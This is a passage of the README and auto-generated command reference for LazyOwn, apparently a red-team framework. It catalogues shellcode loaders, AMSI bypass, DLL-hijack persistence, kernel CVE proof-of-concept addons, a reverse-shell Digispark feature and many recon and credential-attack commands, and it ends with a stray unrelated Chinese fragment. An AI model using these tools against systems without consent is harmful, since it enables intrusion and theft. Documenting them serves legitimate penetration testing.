- **[gomulti_loader](https://github.com/grisuno/gomulti_loader)** — multi-platform Go shellcode loader (Linux + Windows). Wired in via `lazyaddons/gomulti_loader_linux.yaml` and `gomulti_loader_windows.yaml`.
- **[win_shellcode](https://github.com/grisuno/win_shellcode)** — collection of Windows shellcode templates ready to be linked from a beacon stub.
- **[ejecutarShellcode](https://github.com/grisuno/ejecutarShellcode)** — minimal "execute-this-shellcode" loaders for quick PoCs.
- **[ShellcodeFluctuation_crosscompile](https://github.com/grisuno/ShellcodeFluctuation_crosscompile)** — cross-compilable port of the ShellcodeFluctuation memory-encryption trick.
- **[LazyLoader](https://github.com/grisuno/LazyLoader)** — generic loader scaffold designed to be extended per engagement.
- **[OverRide](https://github.com/grisuno/OverRide)** — DLL hijack / DLL search-order-override toolkit for Windows persistence.
- **[ShadowLink](https://github.com/grisuno/ShadowLink)** — link-time / symbol-rewrite tooling for Linux ELF stagers.
- **[netsh_helper_dll](https://github.com/grisuno/netsh_helper_dll)** — `netsh` helper-DLL persistence template for Windows.

### Defensive bypass / instrumentation

- **[amsi](https://github.com/grisuno/amsi)** — AMSI bypass research and PoCs; invoked from LazyOwn payloads when AV/EDR is the limiting factor.

### Exploits and CVE PoCs

LazyOwn already vendors several recent kernel-class PoCs through the addon
system (`lazyaddons/copyfail.yaml`, `lazyaddons/dirtyfrag.yaml`,
`lazyaddons/CVE-2022-22077.yaml`, `lazyaddons/CVE_2025_24071_PoC.yaml`,
`lazyaddons/ebird3.yaml`). The original repositories are listed here for
auditability and citation:

- **[CVE-2022-22077](https://github.com/grisuno/CVE-2022-22077)** — RTCore64.sys arbitrary R/W IOCTL — used by the LazyOwn BYOVD chain.
- **[copy-fail-CVE-2026-31431](https://github.com/grisuno/copy-fail-CVE-2026-31431)** — next-gen Dirty Pipe variant. Backed by the `copyfail` lazyaddon.
- **[ebird3](https://github.com/grisuno/ebird3)** — Early-Bird APC injection + NT Native API loader; produces stealthy in-memory Windows payloads.

> **Want to add yours?** Drop a `lazyaddons/<name>.yaml` describing
> `repo_url`, `install_command` and `execute_command`; LazyOwn will pick it
> up automatically and surface it through the MCP `lazyown_palette` view.

## Abstract

LazyOwn is a framework that streamlines its workflow and automates many tasks and tests through aliases and various tools, functioning like a Swiss army knife with multipurpose blades for hacking xD.

## Lazyducky_digispark

![LazyOwn](https://github.com/user-attachments/assets/b7e8c257-c0de-4033-bf4b-57ebc87dcb97)

      Compiles and uploads an .ino sketch to a Digispark device using Arduino CLI and Micronucleus.

        This method checks if Arduino CLI and Micronucleus are installed on the system.
        If they are not available, it installs them. It then compiles a Digispark sketch
        and uploads the generated .hex file to the Digispark device.

        The method performs the following actions:
        1. Checks for the presence of Arduino CLI and installs it if not available.
        2. Configures Arduino CLI for Digispark if not already configured.
        3. Generates a reverse shell payload and prepares the sketch for Digispark.
        4. Compiles the prepared Digispark sketch using Arduino CLI.
        5. Checks for the presence of Micronucleus and installs it if not available.
        6. Uploads the compiled .hex file to the Digispark device using Micronucleus.

        Args:
            line (str): Command line input provided by the user, which may contain additional parameters.

        Returns:
            None: The function does not return any value but may modify the state of the system
                by executing commands.


## Star History

<a href="https://www.star-history.com/#grisuno/LazyOwn&Date">
 <picture>
   <source media="(prefers-color-scheme: dark)" srcset="https://api.star-history.com/svg?repos=grisuno/LazyOwn&type=Date&theme=dark" />
   <source media="(prefers-color-scheme: light)" srcset="https://api.star-history.com/svg?repos=grisuno/LazyOwn&type=Date" />
   <img alt="Star History Chart" src="https://api.star-history.com/svg?repos=grisuno/LazyOwn&amp;type=Date" />
 </picture>
</a>

# Documentation by readmeneitor.py

Documentation automatically created by the script `readmeneitor.py` created for this project; maybe one day it will have its own repo, but for now, I don't see it as necessary.

## ReadMenator now have a repository

[https://github.com/grisuno/ReadMenator](https://github.com/grisuno/ReadMenator)

# Legal disclaimer:
Usage of LazyOwn RedTeam Framework for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.


---

<!-- START UTILS -->
# LazyOwn Command Reference

Auto-generated by readmeneitor.py from source docstrings and cli/command_index.json.

## Table of Contents

- [01. Reconnaissance](#01-reconnaissance) (38 commands)
- [02. Scanning & Enumeration](#02-scanning-&-enumeration) (74 commands)
- [03. Exploitation](#03-exploitation) (66 commands)
- [04. Post-Exploitation](#04-post-exploitation) (45 commands)
- [05. Persistence](#05-persistence) (33 commands)
- [06. Privilege Escalation](#06-privilege-escalation) (16 commands)
- [07. Credential Access](#07-credential-access) (31 commands)
- [08. Lateral Movement](#08-lateral-movement) (30 commands)
- [09. Data Exfiltration](#09-data-exfiltration) (35 commands)
- [10. Command & Control](#10-command-&-control) (28 commands)
- [11. Reporting](#11-reporting) (26 commands)
- [12. Miscellaneous](#12-miscellaneous) (169 commands)
- [13. Diagnostics](#13-diagnostics) (2 commands)
- [Uncategorized](#uncategorized) (135 commands)

---

## 01. Reconnaissance

### `alterx`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Executes the 'alterx' command for subdomain enumeration on the provided self.params['domain']. If 'alterx'

### `apache_users`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Performs enumeration of users from a target system using `apache-users`.

### `binarycheck`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Performs various checks on a selected binary to gather information and protections.

### `cve`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Search for a CVE using the CIRCL API.

### `dig`

**Phase:** recon | **Source:** `cli/commands/recon.py`

Executes the `dig` command to query DNS information.

### `dnschef`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Executes the DNSChef tool to monitor DNS queries and intercept responses.

### `dnsenum`

**Phase:** recon | **Source:** `cli/commands/recon.py`

Performs DNS enumeration using `dnsenum` to identify subdomains for a given domain.

### `dnsmap`

**Phase:** recon | **Source:** `cli/commands/recon.py`

Performs DNS enumeration using `dnsmap` to discover subdomains for a specified domain.

### `dnstool_py`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Executes the dnstool.py tool to modify Active Directory-integrated DNS records.

### `estorides_import`

**Phase:** recon | **Source:** `cli/commands/estorides.py`

Import Estorides-discovered entities into LazyOwn database and scope.

### `estorides_loop`

**Phase:** recon | **Source:** `cli/commands/estorides.py`

Run the bidirectional Estorides <-> LazyOwn feedback loop.

### `estorides_seed`

**Phase:** recon | **Source:** `cli/commands/estorides.py`

Feed LazyOwn hosts/domains into Estorides for passive OSINT discovery.

### `estorides_surface`

**Phase:** recon | **Source:** `cli/commands/estorides.py`

Show the combined active + passive attack surface.

### `finalrecon`

**Phase:** recon | **Source:** `cli/commands/recon.py`

Runs the `finalrecon` tool to perform a web server vulnerability scan against the specified target host.

### `getcap`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Retrieve and display file capabilities on the system.

### `gospider`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Try gospider for web spidering.

### `graudit`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Executes the graudit command to perform a static code analysis with the specified options.

### `httprobe`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Executes the httprobe tool to probe domains for working HTTP and HTTPS servers.

### `ipinfo`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Retrieves detailed information about an IP address using the ARIN API.

### `launchpad`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Searches for packages on Launchpad based on the provided search term and extracts codenames from the results. The distribution is extracted from the search term.

### `metabigor`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Executes Metabigor commands for OSINT and scanning tasks with guided input or predefined arguments.

### `openssl_sclient`

**Phase:** recon | **Source:** `cli/commands/recon.py`

Uses `openssl s_client` to connect to a specified host and port, allowing for testing and debugging of SSL/TLS connections.

### `ping`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Perform a ping to check host availability and infer the operating system based on TTL values.

### `ports`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Lists all open TCP and UDP ports on the local system.

### `proxy`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Runs a small proxy server to modify HTTP requests on the fly.

### `recon`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Performs reconnaissance on a specified self.params['domain'] using crt.sh (the target must be visible on internet), pup, httprobe, and EyeWitness.

### `serveralive2`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Command serveralive2: Uses Impacket to connect to a remote MSRPC interface and retrieves the server bindings.

### `sherlock`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Executes the Sherlock tool to find usernames across social networks.

### `sslscan`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Run an SSL scan on the specified remote host.

### `surface`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Render the network surface graph in the terminal.

### `tcpdump_capture`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Starts packet capture using `tcpdump` on the specified interface.

### `tcpdump_icmp`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Starts `tcpdump` to capture ICMP traffic on the specified interface.

### `trace`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Traces the DNS information for a given self.params['domain'] using the FreeDNS service. (using freedns IP Not your IP)

### `trufflehog`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Executes trufflehog to search for secrets in a given Git repository URL.

### `tshark_analyze`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Analyzes a packet capture file using `tshark` based on the provided remote host IP.

### `waybackmachine`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Fetch URLs from the Wayback Machine for a given website.

### `whatweb`

**Phase:** recon | **Source:** `cli/commands/recon.py`

Performs a web technology fingerprinting scan using `whatweb`.

### `windapsearchscrapeusers`

**Phase:** recon | **Source:** `cli/commands/recon_migrated.py`

Extracts usernames from a JSON output generated by go-windapsearch and appends them


## 02. Scanning & Enumeration

### `ad_ldap_enum`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes ad-ldap-enum to enumerate Active Directory objects (users, groups, computers)

### `allin`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Execute the AlliN.py tool with various scan modes and parameters.

### `amass`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Executes Amass to perform a passive enumeration on a given domain.

### `arjun`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes an Arjun scan on the specified URL for parameter discovery.

### `arpscan`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Executes an ARP scan using `arp-scan`.

### `batchnmap`

**Phase:** enum | **Source:** `cli/commands/recon.py`

Runs the internal module `modules/lazynmap.sh` for multiple Nmap scans.

### `bbot`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Executes a BBOT scan to perform various reconnaissance tasks.

### `blazy`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Command blazy: Installs and runs blazy for multi-vulnerability web application scanning.

### `bloodhound`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Perform LDAP enumeration using bloodhound-python with credentials from a file.

### `breacher`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Command breacher: Installs and runs Breacher for finding admin login pages and EAR vulnerabilities.

### `certipy`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes the Certipy tool to interact with Active Directory Certificate Services.

### `certipy_ad`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Run certipy-ad against Active Directory Certificate Services.

### `changeme`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes a changeme scan on a specified target URL or host.

### `cme`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Execute CrackMapExec (CME) for SMB enumeration and authentication attempts against a target.

### `davtest`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Tests WebDAV server configurations using `davtest`.

### `dirsearch`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Runs the `dirsearch` tool to perform directory and file enumeration on a specified URL.

### `dmitry`

**Phase:** enum | **Source:** `cli/commands/scan.py`

This function constructs and executes a command for the 'dmitry' tool.

### `enum4linux`

**Phase:** enum | **Source:** `cli/commands/enum.py`

Performs enumeration of information from a target Linux/Unix system using `enum4linux`.

### `enum4linux_ng`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Performs enumeration of information from a target system using `enum4linux-ng`.

### `evil_ssdp`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Runs evil-ssdp with various options and user-selected templates.

### `feroxbuster`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Command feroxbuster: Installs and runs Feroxbuster for performing forced browsing and directory brute-forcing.

### `finger_user_enum`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes the `finger-user-enum` tool for enumerating users on the target host.

### `fuzz`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes a web server fuzzing script with user-provided parameters.

### `getnpusers`

**Phase:** enum | **Source:** `cli/commands/enum.py`

sudo impacket-GetNPUsers mist.htb/ -no-pass -usersfile sessions/users.txt

### `gobuster`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Uses `gobuster` for directory and virtual host fuzzing based on provided parameters. Supports directory enumeration and virtual host discovery.

### `hostdiscover`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Discover active hosts in a subnet by performing a ping sweep.

### `hound`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes the hound tool for Hound is a simple and light tool for information gathering and capture exact GPS coordinates

### `kerbrute`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes the Kerbrute tool to enumerate user accounts against a specified target self.params['domain'] controller.

### `lazynmap`

**Phase:** enum | **Source:** `cli/commands/recon.py`

Runs the internal module `modules/lazynmap.sh` with target mode.

### `ldapdomaindump`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Dumps LDAP information using `ldapdomaindump` with credentials from a file.

### `ldapsearch`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes an LDAP search against a target remote host (self.params['rhost']) and saves the results.

### `lookupsid`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes the Impacket lookupsid tool to enumerate SIDs on a target system.

### `lookupsid_py`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes the LookupSID tool to perform SID enumeration on a target system.

### `loxs`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Command loxs: Installs and runs Loxs for multi-vulnerability web application scanning.

### `lynis`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Performs a Lynis audit on the specified remote system.

### `magicrecon`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Command magicrecon: Automates the setup and usage of MagicRecon to perform various types of reconnaissance and vulnerability scanning on specified targets.

### `mqtt_check_py`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes the MQTT check tool to verify credentials on a target system with optional SSL.

### `nbtscan`

**Phase:** enum | **Source:** `cli/commands/recon.py`

Performs network scanning using `nbtscan` to discover NetBIOS names and addresses in a specified range.

### `net_rpc_addmem`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes the net rpc group addmem command to add a user to a specified group in Active Directory.

### `netexec`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes netexec with various options for network protocol operations.

### `netview`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes the Impacket netview tool to list network shares on a specified target.

### `nikto`

**Phase:** enum | **Source:** `cli/commands/recon.py`

Runs the `nikto` tool to perform a web server vulnerability scan against the specified target host.

### `nmapscript`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Perform an Nmap scan using a specified script and port.

### `nuclei`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Executes a Nuclei scan on a specified target URL or host.

### `odat`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Command odat: Runs the ODAT sidguesser module to guess Oracle SIDs on a target Oracle database.

### `openredirex`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Command openredirex: Clones, installs, and runs OpenRedirex for testing open redirection vulnerabilities.

### `osmedeus`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Executes Osmedeus scans with guided input for various scanning scenarios.

### `parsero`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes a parsero scan on a specified target URL or host.

### `parth`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Command parth: Installs and runs Parth for discovering vulnerable URLs and parameters.

### `portdiscover`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Scan all ports on a specified host to identify open ports.

### `portservicediscover`

**Phase:** enum | **Source:** `cli/commands/scan.py`

Scan all ports on a specified host to identify open ports and associated services.

### `pre2k`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Executes the pre2k tool to query the self.params['domain'] for pre-Windows 2000 machine accounts or to pass a list of hostnames to test authentication.

### `pykerbrute`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

Command pykerbrute: Automates the installation and execution of PyKerbrute for bruteforcing Active Directory accounts using Kerberos pre-authentication.

### `rdp_check_py`

**Phase:** enum | **Source:** `cli/commands/scan_migrated.py`

---

[Read more](https://github.com/grisuno/lazyown)
下载工具
渗透测试报告中保管链所需。
新鲜度注解JSON SITREP 和 target_context 中的每个证据文件都带有 age_seconds、age_human,一旦超过 freshness_threshold_seconds(默认 7 天;可按调用配置)则标记 stale=true。防止代理基于过时的侦察证据进行利用。
cli/aliases.py